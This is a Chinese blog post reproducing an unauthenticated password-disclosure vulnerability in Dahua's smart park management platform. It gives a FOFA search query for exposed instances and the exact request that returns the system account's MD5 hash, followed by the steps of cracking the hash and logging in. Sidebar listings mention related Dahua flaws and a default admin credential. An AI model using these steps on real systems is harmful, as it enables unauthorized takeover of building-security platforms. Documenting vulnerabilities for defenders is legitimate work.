【漏洞复现】大华智慧园区综合管理平台任意密码读取

最新推荐文章于 2024-05-11 13:44:48 发布
最新推荐文章于 2024-05-11 13:44:48 发布
阅读量489 收藏 6
点赞数 8
分类专栏: 漏洞复现 渗透测试 网络安全 文章标签: 安全 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75756681/article/details/135405777
版权

前言

此文章仅用于技术交流,严禁用于对外发起恶意攻击!!!

 

一、产品简介

大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。

 

 

二、漏洞描述

由于该平台未对接口权限做限制,攻击者可以从user_getUserInfoByUserName.action接口获取任意用户密码(MD5格式)

 

 

三、影响范围

目前所有版本

 

 

 三、复现环境

fofa语句:

app="dahua-智慧园区综合管理平台"

 

 

四、 漏洞复现  

 

1、寻找大华

 

选择大华链接

 

 

 

 2、访问该地址

ip:port/admin/user_getUserInfoByUserName.action?userName=system

如图:

 

 


 

 

 

 

3、拿到MD5值去解密 

 

拿到密码后用MD5解密

4、登陆系统 

小白在学习·
关注
  • 8
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
大华智慧园区综合管理平台密码泄露漏洞
xiaokp7的博客
09-07 943
大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。由于敏感目录并未进行鉴权,所以可以直接得到system的密码(采用MD5加密)。
漏洞复现大华智慧园区综合管理平台任意密码读取漏洞
失心少年
08-29 739
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!
DH 软件平台 DH-DSS-H8900S2-B 智慧园区综合管理平台-智慧园区APP业务介绍和配置说明 V3.001.0000000.2(行业).docx
05-18
DH 软件平台 DH-DSS-H8900S2-B 智慧园区综合管理平台-智慧园区APP业务介绍和配置说明 V3.001.0000000.2(行业).docx
大华智慧园区前台任意文件上传(1day)
10-06
大华智慧园区前台任意文件上传(1day)
大华EIMS-capture_handle接口远程命令执行漏洞
qq_36334672的博客
03-14 353
大华EIMS CAPTURE_HANDLE接口允许远程命令执行。
DH-DSS-H8900智慧园区综合管理平台
03-01
DH-DSS-H8900 系列是为通用性公共建筑物提供安全和高效管理而打造的智慧园区综合管理平台,通过融合大华在安防和智能化领域的专业经验和前沿技术,集成视频,门禁、报警,停车场,考 勤,访客,可视对讲,信息发布等多个业务 支持可视对讲,门禁一卡通、停车场管理  通过对讲设备管理,实现户户通话,室内报警联动,信息发布等功能  通过门禁管理,实现门禁的开关门,并实现门禁和视频的联动  通过卡口、道闸、LED 设备管理,实现出入口的综合性智能化管理  实现多设备、多路通道、多窗口的实时监控和预览  支持双目监控  支持鱼球联动  支持 36 路录像查询和回放  支持监控计划任务定制,多路多窗口视频轮巡、同时回放  支持本地抓图及本地录像  支持语音对讲  通过接入报警主机,实现报警管理  支持报警联动配置,弹出联动视频、查看多设备报警提示、录像信息功能 支持智能设备应用 支持智能跟踪、人数统计、主从跟随、特征识别、守望者、人脸识别等智能设备应用  通过配置电子地图,随时定位设备,从而轻松地部署管理  视频上墙,配置简单  通过配置巡更点、巡更路线,实现巡更管理
大华智慧园区综合管理平台存在未授权高危漏洞(0Day)及以往漏洞POC合集
02-27
大华智慧园区综合管理平台存在未授权高危漏洞(0Day)及以往漏洞POC合集
大华平台linux密码,大华DSS平台低权限账户越权直接修改system密码
weixin_32155269的博客
05-04 8573
大华DSS平台低权限账户越权直接修改system密码前提:拥有config配置用户密码被测试DSS版本信息:V3.11.003.R.20150929.374164前提:拥有config配置用户密码一.取得所有用户名1.进入config管理界面地址:http://[IP]/config/user_toLoginPage.action默认用户名admin密码1234562.配置自动SQL备份FTP...
大华智慧园区综合管理平台任意密码读取漏洞复现
08-14 1973
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。
【1day】复现大华智慧园区综合管理平台存在任意密码读取漏洞
记录并分享学习安全的知识点..
08-16 443
大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。大华智慧园区综合管理平台存在任意密码读取漏洞,远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限。
大华智慧小区综合解决方案.doc
05-17
综合物业管理解决方案,涵盖安防,报警,人员管理,车辆管理
大华智慧园区管理平台任意密码读取漏洞 复现
薛定谔嘚喵博客
10-08 261
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务、摄像监控等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。 大华智慧园区综合管理平台存在任意密码读取漏洞,可以直接读取管理账号名以及其密码Hash值,造成未授权登入访问劫持园区管理平台,危害性高。
大华智慧园区综合管理平台SQL注入漏洞复现
0xSec
08-10 2275
大华智慧园区综合管理平台未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限。
德国储能项目锂电池储能集装箱突发火灾:安全挑战再引关注
最新发布
iotsensor的博客
05-11 293
德国警方估计,此次火灾造成的经济损失约为50万欧元,但更为严重的是,起火原因至今尚未明确,这无疑给储能系统的安全性再次敲响了警钟。在储能系统大规模应用的背景下,如何有效预防和控制锂离子电池的热失控和火灾风险成为了一个亟待解决的问题。目前,虽然技术上尚未有绝对保证锂电池不发生热失控的方法,但通过气体传感器技术等手段对储能电池进行实时监测和预警,仍被视为一种可行的预防措施。针对储能电池热失控,要坚持“早发现,早处置”的原则,对储能集装箱锂电池热失控初级阶级进行超前探测预警,将火灾隐患扑灭在萌芽阶段。
12350 安全生产举报投诉特服热线系统解决方案
05-11 485
随着经济的持续发展和社会的不断进步,安全生产问题日益凸显,成为影响社会稳定和人民福祉的重要因素。在此背景下,加强安全生产监管,提高监管效率和质量显得尤为重要。举报投诉作为安全生产监管的重要手段之一,具有信息来源广泛、反映问题直接、监督作用明显等特点。然而,传统的举报投诉方式往往存在信息传递不畅、处理效率低下等问题,难以满足现代社会对安全生产监管的需求。因此,开发一套高效、智能、安全的特服热线系统,对于提升安全生产监管水平、保障人民群众生命财产安全具有重要意义。
ConcurrentHashMap并发安全的实现
Mr.xing的博客
05-11 31
JDK1.7使用的是分段锁机制,其内部类Segment 继承了ReentrantLock,将容器内的数组划分成多段区域,每个区域对应一把锁,相比于HashTable确实提升了不少并发能力,但在数据量庞大的情况下,性能依然不容乐观,只能通过不断的增加锁来维持并发性能。而JDK1.8则使用了CAS乐观锁 + synchronized 局部锁处理并发问题,锁粒度更细,即使数据量很大也能保证良好的并发性。ConcurrentHashMap并发安全实现源码如下。
SGP.22-V.3.1-安全2
liudong200618的博客
05-08 868
4. **BSP 会话密钥的生成**:eUICC 执行 "ES8+.InitialiseSecureChannel" 功能后,将生成 BSP 会话密钥,包括 S-ENC(用于加密的会话密钥)和 S-MAC(用于 MAC 计算的会话密钥),以及初始 MAC 链值。2. **不加密的 TLVs**:这些 TLVs 不需要加密。5. **后续 TLVs 的保护**:SM-DP+ 利用由 eUICC 生成的 S-ENC 和 S-MAC 密钥来加密和验证接下来的 TLVs,确保了整个通信过程的安全性。
大华智慧园区综合管理平台rce
08-17
大华智慧园区综合管理平台(RCE)是一种基于大数据和人工智能技术的智慧园区管理解决方案。该平台集成了多个子系统,包括智能安防、能源管理、楼宇自动化、智慧交通等,旨在提供全面的园区管理和优化,促进园区的可...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值